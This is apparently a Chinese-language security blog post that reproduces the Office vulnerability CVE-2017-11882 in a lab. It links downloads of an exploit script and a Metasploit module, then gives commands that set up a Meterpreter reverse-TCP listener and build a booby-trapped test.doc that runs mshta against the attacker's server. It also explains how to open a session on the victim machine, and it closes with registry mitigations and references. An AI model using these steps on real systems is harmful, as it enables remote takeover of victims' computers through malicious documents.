0×01前言

2017年11月14日微软发布了潜伏17年之久的office远程代码执行漏洞（cve-2017-11882）。该漏洞为office内存破坏漏洞，影响目前流行的office版本。

0×02 漏洞复现

测试环境：win10+kali+office 2016

Win10ip：192.168.8.100（靶机）

Kaliip：192.168.183.128（攻击机）

所需工具如下：

（1）  Command43b_CVE-2017-11882.py：生成攻击doc的python脚本

（2）  PS_shell.rb：msf的攻击模块文件

链接: https://pan.baidu.com/s/1o8cbDzW 密码: 2pqa

1.Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以

2.我把PS_shell.rb和ms17-010.rb放置一起了。

文件路径是/usr/share/metasploit-framework/modules/exploits/windows/smb/PS_shell.rb

通过msf的ps_shell模块 漏洞复现(win10)

1.   启动msf

msfconsole

2.   查找对应的模块命令：search PS_shell

3.   利用msf生成利用的脚本

use exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.183.128（攻击机的ip）

set uripath abc

exploit

4.   接下来打开一个新的控制台窗口，找到Command43b_CVE-2017-11882.py的路径，

输入命令：

python Command43b_CVE-2017-11882.py -c "mshtahttp://192.168.183.128:8080/abc" -o test.doc

然后会在同目录生成 test.doc 文件，然后将这个test.doc文件发送到靶机的电脑上，打开这个test.doc文件，

切换回Kali，说明已成功建立连接。

5.   然后在msf里输入sessions查看一下

（靶机需关杀软，亲测360安全卫士、金山毒霸、电脑管家都会拦截）

6.   切换进入seiiions –i 1

这个时候就已经入侵到靶机了。

0×03 漏洞影响

MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

0×04 漏洞修复建议

临时解决方案：

不能及时更新安全补丁的用户，用户可以在命令提示符下运行以下命令, 在 Windows 注册表中禁用该组件:

regadd"HKLM\SOFTWARE\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}"/v"Compatibility Flags" /t REG_DWORD /d 0x400

对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令:

regadd"HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM  Compatibility\{0002CE02-0000-0000-C000-000000000046}"/v"Compatibility Flags" /t REG_DWORD /d 0x400

此外, 用户还应启用MicrosoftOffice 沙箱等以防止活动内容执行 (OLE/ActiveX/Macro)。

附：参考链接：

https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html

http://www.cnvd.org.cn/flaw/show/CNVD-2017-34031

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882(微软官方安全建议)